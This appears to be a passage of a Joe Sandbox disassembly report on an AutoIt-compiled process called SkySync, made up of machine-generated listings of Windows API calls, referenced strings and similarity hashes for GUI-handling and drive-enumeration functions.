Instruction Fuzzy Hash: C5A19F72019701AFD721AF64DC48AAB7BE9FF88321F500A19F566971E1CB30E885CF52

Function 00A92FE8 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00A93072
DeleteObject.GDI32(00000000), ref: 00A930B8
DeleteObject.GDI32(00000000), ref: 00A930C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00A930CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00A930D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00ACC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ACC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ACCBDE

Part of subcall function 00A91F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A92412,?,00000000,?,?,?,?,00A91AA7,00000000,?), ref: 00A91F76

SendMessageW.USER32(?,00001053), ref: 00ACCC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ACCC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ACCC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ACCC53

Strings

0, xrefs: 00ACCA72

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b7b7f4ff242ebfc7b68989f7136fd5e061864d7ab82cc51c596307569273480a
Instruction ID: d6042167f177b1dffd6345b5ed8931de94a95d2941739bac6eea974f80af178d
Opcode Fuzzy Hash: b7b7f4ff242ebfc7b68989f7136fd5e061864d7ab82cc51c596307569273480a
Instruction Fuzzy Hash: 92126931604201AFDF25DF24C889FA6BBF1BF08321F15456DE59A8B662CB31ED52CB91

Function 00B07B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B07BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B07C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B07CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B07CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B07D1D
GetClientRect.USER32(00000000,?), ref: 00B07D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B07D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B07D7C
GetStockObject.GDI32(00000011), ref: 00B07D8C
SelectObject.GDI32(00000000,00000000), ref: 00B07D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B07DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B07DA9
DeleteDC.GDI32(00000000), ref: 00B07DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B07DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B07DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B07E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B07E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B07E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B07E85
GetStockObject.GDI32(00000011), ref: 00B07E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B07E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B07EA5

Strings

static, xrefs: 00B07D67, 00B07E7F
msctls_progress32, xrefs: 00B07E26
DISPLAY, xrefs: 00B07D72
AutoIt v3, xrefs: 00B07D15

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 62995cfbc72fb91322cfe3702c403eff62e1674a7023eacea0eb322a0ef78464
Instruction ID: 10a596426d1883b3b5c2b7ed837ceb01c8e5cc40dfdbd607339c26f4a07854ab
Opcode Fuzzy Hash: 62995cfbc72fb91322cfe3702c403eff62e1674a7023eacea0eb322a0ef78464
Instruction Fuzzy Hash: DAA190B1A50219BFEB24DB64DC4AFAEBBB9EB05711F004144FA15A72E1CB70AD41CB60

Function 00AFB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AFB361
GetDriveTypeW.KERNEL32(?,00B22C4C,?,\\.\,00B20980), ref: 00AFB43E
SetErrorMode.KERNEL32(00000000,00B22C4C,?,\\.\,00B20980), ref: 00AFB59C

Strings

SATA, xrefs: 00AFB54F
Virtual, xrefs: 00AFB564
iSCSI, xrefs: 00AFB541
Unknown, xrefs: 00AFB45E, 00AFB502
\\.\, xrefs: 00AFB3B3
ATA, xrefs: 00AFB517
PhysicalDrive, xrefs: 00AFB3EA
MMC, xrefs: 00AFB55D
SSD, xrefs: 00AFB4C9
Fibre, xrefs: 00AFB52C
Removable, xrefs: 00AFB490
FileBackedVirtual, xrefs: 00AFB56B
USB, xrefs: 00AFB533
CDROM, xrefs: 00AFB472
SAS, xrefs: 00AFB548
RAID, xrefs: 00AFB53A
SCSI, xrefs: 00AFB509
Network, xrefs: 00AFB47C
SSA, xrefs: 00AFB525
ATAPI, xrefs: 00AFB510
RAMDisk, xrefs: 00AFB468
Fixed, xrefs: 00AFB486
1394, xrefs: 00AFB51E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 16cd5d46c49e0427f2a14086b286a1c75801187de1f9300b5f46a0ca44151172
Instruction ID: 51a3c37ab07402bcaa9aecee28de21f1ae3767c4ea9977a21ba08fae3916117a
Opcode Fuzzy Hash: 16cd5d46c49e0427f2a14086b286a1c75801187de1f9300b5f46a0ca44151172
Instruction Fuzzy Hash: 9D517030B6420DEB8B00EBA0CB42D79B7F1AB44780B344155F607E72A1DB79EE45EB61

Function 00B1A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B1A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B1A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00B1A1CC

Strings

0, xrefs: 00B1A209

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: d1caccb73ea4c6f62db4cf9d62049f467946d37e41c6ba1fa4a22d1b807fa341
Instruction ID: 4a3661061768e2d6f2064c6f771383086529aac8a29211542f4a7b4faa26b35b
Opcode Fuzzy Hash: d1caccb73ea4c6f62db4cf9d62049f467946d37e41c6ba1fa4a22d1b807fa341
Instruction Fuzzy Hash: 4402033010A300AFD725CF14C888BEABBE5FF49714F44859DF999972A1CB74E985CB92

Function 00B1AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B1AF51
SetTextColor.GDI32(?,?), ref: 00B1AF55
GetSysColorBrush.USER32(0000000F), ref: 00B1AF6B
GetSysColor.USER32(0000000F), ref: 00B1AF76
CreateSolidBrush.GDI32(?), ref: 00B1AF7B
GetSysColor.USER32(00000011), ref: 00B1AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B1AFA1
SelectObject.GDI32(?,00000000), ref: 00B1AFB2
SetBkColor.GDI32(?,00000000), ref: 00B1AFBB
SelectObject.GDI32(?,?), ref: 00B1AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00B1AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B1AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00B1B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B1B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B1B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00B1B0A4
DrawFocusRect.USER32(?,?), ref: 00B1B0AF
GetSysColor.USER32(00000011), ref: 00B1B0BD
SetTextColor.GDI32(?,00000000), ref: 00B1B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B1B0D9
SelectObject.GDI32(?,00B1AC1F), ref: 00B1B0F0
DeleteObject.GDI32(?), ref: 00B1B0FB
SelectObject.GDI32(?,?), ref: 00B1B101
DeleteObject.GDI32(?), ref: 00B1B106
SetTextColor.GDI32(?,?), ref: 00B1B10C
SetBkColor.GDI32(?,?), ref: 00B1B116

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 39ce6502a611b9086fbdd4d49ae0808422673c001184dc12ef7113ef2f2f7edd
Instruction ID: 6245d4892323d49e4d5c0b0d3259f90587dcabdb1edd6d17fad9dffe977fe9e6
Opcode Fuzzy Hash: 39ce6502a611b9086fbdd4d49ae0808422673c001184dc12ef7113ef2f2f7edd
Instruction Fuzzy Hash: B4616D71911218AFDF21AFA4DC88EEE7BB9EF08320F104155F915AB2A2DB759941CF90

Function 00B14ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B15007
GetDesktopWindow.USER32 ref: 00B1501C
GetWindowRect.USER32(00000000), ref: 00B15023
GetWindowLongW.USER32(?,000000F0), ref: 00B15085
DestroyWindow.USER32(?), ref: 00B150B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B150DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B150F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B1511E
SendMessageW.USER32(?,00000421,?,?), ref: 00B15133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B15146
IsWindowVisible.USER32(?), ref: 00B15166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B15181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B15195
GetWindowRect.USER32(?,?), ref: 00B151AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00B151D3
GetMonitorInfoW.USER32(00000000,?), ref: 00B151ED
CopyRect.USER32(?,?), ref: 00B15204
SendMessageW.USER32(?,00000412,00000000), ref: 00B1526F

Strings

tooltips_class32, xrefs: 00B150D3
0, xrefs: 00B14FB2
(, xrefs: 00B151E0

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 2a6b20c7088d10d7b981f85fd610de5127d46be55b1727583aa3a22def920af7
Instruction ID: 8f685e9d528c7a0f2e8d0bcfe404d2b8f509126ea652e67c3ab275045a2bcbf0
Opcode Fuzzy Hash: 2a6b20c7088d10d7b981f85fd610de5127d46be55b1727583aa3a22def920af7
Instruction Fuzzy Hash: 8EB1AB71614700EFDB14DF64C989BAABBE4FF88300F408A5CF4999B291DB70E845CB92

Function 00B18FFA Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B190EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B190FB
CharNextW.USER32(0000014E), ref: 00B1912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B1916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B19181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B19192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B191AF
SetWindowTextW.USER32(?,0000014E), ref: 00B191FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B19211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B19242
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B192B0
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B19339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B19391
SendMessageW.USER32(?,0000133D,?,?), ref: 00B1943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00B19460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B194AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B194D7
DrawMenuBar.USER32(?), ref: 00B194E6
SetWindowTextW.USER32(?,0000014E), ref: 00B1950E

Strings

0, xrefs: 00B19478

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1015379403-4108050209
Opcode ID: 7a7401391751dc8a57fa9af57f3d6ebdbc3aa8fa60f8fc556d86a2480fa3eb06
Instruction ID: 1f50ed62287f2abdf1bc8caf11b68a92cebc4863e71d956035e962234726e3c7
Opcode Fuzzy Hash: 7a7401391751dc8a57fa9af57f3d6ebdbc3aa8fa60f8fc556d86a2480fa3eb06
Instruction Fuzzy Hash: 79E18B70900248AEDF219F50CC98EEE7BF9EF09710F908196F915AB291DB708AC5CF61

Function 00A92BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A92C8C
GetSystemMetrics.USER32(00000007), ref: 00A92C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A92CBF
GetSystemMetrics.USER32(00000008), ref: 00A92CC7
GetSystemMetrics.USER32(00000004), ref: 00A92CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A92D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A92D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A92D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A92D60
GetClientRect.USER32(00000000,000000FF), ref: 00A92D7E
GetStockObject.GDI32(00000011), ref: 00A92D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A92DA5

Part of subcall function 00A92714: GetCursorPos.USER32(?), ref: 00A92727
Part of subcall function 00A92714: ScreenToClient.USER32(00B577B0,?), ref: 00A92744
Part of subcall function 00A92714: GetAsyncKeyState.USER32(00000001), ref: 00A92769
Part of subcall function 00A92714: GetAsyncKeyState.USER32(00000002), ref: 00A92777

SetTimer.USER32(00000000,00000000,00000028,00A913C7), ref: 00A92DCC

Strings

AutoIt v3 GUI, xrefs: 00A92D44

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: a7de1918a98ce61c1ebfcf61c4d969884310c1bc74634b4b1910a124a3178bf9
Instruction ID: bc68684ec966d184182f660a608076bc02bece8f280c89509b66a8aae1d0042a
Opcode Fuzzy Hash: a7de1918a98ce61c1ebfcf61c4d969884310c1bc74634b4b1910a124a3178bf9
Instruction Fuzzy Hash: 52B15D71A4020AAFDF14DFA8DD99BAE7BF4FB08311F104169FA15A7290DB74A851CB50

Function 00AB0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00B20980,?,?,?,?,?), ref: 00AB04E3
IsWindow.USER32(?), ref: 00AE66BB

Strings

REGEXPTITLE, xrefs: 00AE64B4
ACTIVE, xrefs: 00AE6488
HANDLE, xrefs: 00AE649E
TITLE, xrefs: 00AE6650
REGEXPCLASS, xrefs: 00AE6506
CLASS, xrefs: 00AE64E5
ALL, xrefs: 00AE6622
LAST, xrefs: 00AE6472
INSTANCE, xrefs: 00AE65FA

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 59d307c1063345482e8be9294243553bd3b0c11862fdb9cd384ca6823461ee8a
Instruction ID: 8dff2d89a3e0513900ef0806ca2b6ef40b8eed45de4484cc63f2e6d0f744c585
Opcode Fuzzy Hash: 59d307c1063345482e8be9294243553bd3b0c11862fdb9cd384ca6823461ee8a
Instruction Fuzzy Hash: 61D1E631104342EFCB18EF21C6819AABBB5BF65384F104E19F495475A2DF30FA59DB92

Function 00B1441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B144AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B1456C

Strings

ISSELECTED, xrefs: 00B14577
VIEWCHANGE, xrefs: 00B1472B
GETSUBITEMCOUNT, xrefs: 00B144F7
SELECTALL, xrefs: 00B145D3
GETSELECTED, xrefs: 00B1469A
DESELECT, xrefs: 00B1465A
SELECTCLEAR, xrefs: 00B145EB
FINDITEM, xrefs: 00B146DF
SELECTINVERT, xrefs: 00B1463C
GETTEXT, xrefs: 00B14515
GETITEMCOUNT, xrefs: 00B144DE
SELECT, xrefs: 00B14606
GETSELECTEDCOUNT, xrefs: 00B1454F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: dc3f61b2ddcf9929c59bcfbeae6c2f665b4db334580e7542ede47db591af58c0
Instruction ID: 47ba8f8628f47060ec625c602260ab8c87303b5a9ea3e953654a03f3e6c31d70
Opcode Fuzzy Hash: dc3f61b2ddcf9929c59bcfbeae6c2f665b4db334580e7542ede47db591af58c0
Instruction Fuzzy Hash: F9A15E302143019FCB14EF24CA92AAAB7E5EF95314F5089A8B8569B3E2DF30ED45CB51

Function 00B056C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00B056E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00B056EC
LoadCursorW.USER32(00000000,00007F00), ref: 00B056F7
LoadCursorW.USER32(00000000,00007F03), ref: 00B05702
LoadCursorW.USER32(00000000,00007F8B), ref: 00B0570D
LoadCursorW.USER32(00000000,00007F01), ref: 00B05718
LoadCursorW.USER32(00000000,00007F81), ref: 00B05723
LoadCursorW.USER32(00000000,00007F88), ref: 00B0572E
LoadCursorW.USER32(00000000,00007F80), ref: 00B05739
LoadCursorW.USER32(00000000,00007F86), ref: 00B05744
LoadCursorW.USER32(00000000,00007F83), ref: 00B0574F
LoadCursorW.USER32(00000000,00007F85), ref: 00B0575A
LoadCursorW.USER32(00000000,00007F82), ref: 00B05765
LoadCursorW.USER32(00000000,00007F84), ref: 00B05770
LoadCursorW.USER32(00000000,00007F04), ref: 00B0577B
LoadCursorW.USER32(00000000,00007F02), ref: 00B05786
GetCursorInfo.USER32(?), ref: 00B05796
GetLastError.KERNEL32(00000001,00000000), ref: 00B057C1

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 5d5abf742808a6c10556794dd0e1f7aa4be8ca1b341691cbb828f7677133323f
Instruction ID: baedf1b86e410416a53c51825ed890310a39f580eba077dee7d84d929f472913
Opcode Fuzzy Hash: 5d5abf742808a6c10556794dd0e1f7aa4be8ca1b341691cbb828f7677133323f
Instruction Fuzzy Hash: 46415470E043196ADB209FB68C49D6FFEF8EF55B10B10452FE519E7291DAB8A401CEA1

Function 00AECB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00AECBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AECBBC
SetWindowTextW.USER32(?,?), ref: 00AECBD3
GetDlgItem.USER32(?,000003EA), ref: 00AECBE8
SetWindowTextW.USER32(00000000,?), ref: 00AECBEE
GetDlgItem.USER32(?,000003E9), ref: 00AECBFE
SetWindowTextW.USER32(00000000,?), ref: 00AECC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AECC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AECC3F
GetWindowRect.USER32(?,?), ref: 00AECC48
SetWindowTextW.USER32(?,?), ref: 00AECCB3
GetDesktopWindow.USER32 ref: 00AECCB9
GetWindowRect.USER32(00000000), ref: 00AECCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AECD0C
GetClientRect.USER32(?,?), ref: 00AECD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AECD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AECD69

